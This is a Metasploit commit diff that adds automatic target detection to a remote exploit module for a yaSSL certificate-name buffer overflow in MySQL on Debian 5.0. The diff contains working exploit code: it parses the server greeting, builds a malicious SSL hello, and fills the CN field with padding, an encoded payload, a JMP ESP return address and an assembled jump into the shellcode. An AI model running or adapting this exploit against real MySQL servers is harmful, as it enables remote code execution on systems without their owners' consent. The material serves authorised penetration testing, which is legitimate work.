added automatic target detection

git-svn-id: file:///home/svn/framework3/trunk@8287 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-28 07:34:47 +00:00 · 2010-01-28 07:34:47 +00:00 · 0fbe42395f
parent f8a09fdc06
commit 0fbe42395f
1 changed files with 46 additions and 5 deletions
--- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb
+++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb
@ -42,6 +42,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is
 				present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary
 				pacakge were not exploitable due to the use of the compiler's FORTIFY feature.
+
+				Although suse11 was mentioned in the original blog post, the binary package they
+				provide does not contain yaSSL or support SSL.
 			},
 			'Author'         => [ 'jduck' ],
 			'License'        => MSF_LICENSE,
@ -67,7 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'linux',
 			'Targets'        =>
 				[
-					[ 'Debian 5.0 - MySQL 5.0.51a-24+lenny2',  { 'JmpEsp' => 0x0807dc34 } ]
+					[ 'Automatic', { } ],
+					[ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)',  { 'JmpEsp' => 0x0807dc34 } ]
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Jan 25 2010'))
@ -79,10 +83,45 @@ class Metasploit3 < Msf::Exploit::Remote

 		connect

-		print_status("Trying target #{target.name}...")
+		# read the mysql server hello :)
+		version = nil
+		if (buf = sock.get_once(-1, 5))
+			print_status("\n" + Rex::Text.to_hex_dump(buf))
+			if (buf =~ /is not allowed to connect/)
+				raise RuntimeError, 'The server refused our connection!'
+			end

-		sock.get_once
+			len1,cmd = buf[0,5].unpack('VC')
+			rest = buf[5,len1]
+			idx = rest.index("\x00")
+			if (idx)
+				version = rest[0,idx]
+				print_status("Server reports version: #{version}")
+			end
+		end

+		# handle automatic target selection
+		mytarget = nil
+		if (target.name =~ /Automatic/)
+			print_status("Attempting to locate a corresponding target")
+			version = "(" + version + ")"
+			targets.each { |tgt|
+				if (tgt.name.include?(version))
+					mytarget = tgt
+				end
+			}
+
+			if (not mytarget)
+				raise RuntimeError, 'Unable to detect target automatically'
+			else
+				print_status("Using automatically detected target: #{mytarget.name}")
+			end
+		else
+			mytarget = target
+			print_status("Trying target #{mytarget.name}...")
+		end
+
+		# create/send the hello packet
 		hello = [0x01000020].pack('V')
 		hello << "\x85\xae\x03\x00"+"\x00\x00\x00\x01"+"\x08\x00\x00\x00"
 		hello << "\x00" * 20
@ -95,13 +134,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		hello << "\x00\x03\x02\x01\x00"
 		sock.put(hello)

-		cn = "A" * (payload_space - payload.encoded.length)
+
+		# build a cn that will trigger the vulnerability
+		cn = rand_text(payload_space - payload.encoded.length)
 		cn << payload.encoded
 		cn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)
 		# NOTE: x in above (also gets passed to free())
 		pad = 1074 - payload_space
 		cn << rand_text(pad)
-		cn << [target['JmpEsp']].pack('V')
+		cn << [mytarget['JmpEsp']].pack('V')
 		distance = 4 + pad + 8 + payload.encoded.length
 		cn << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string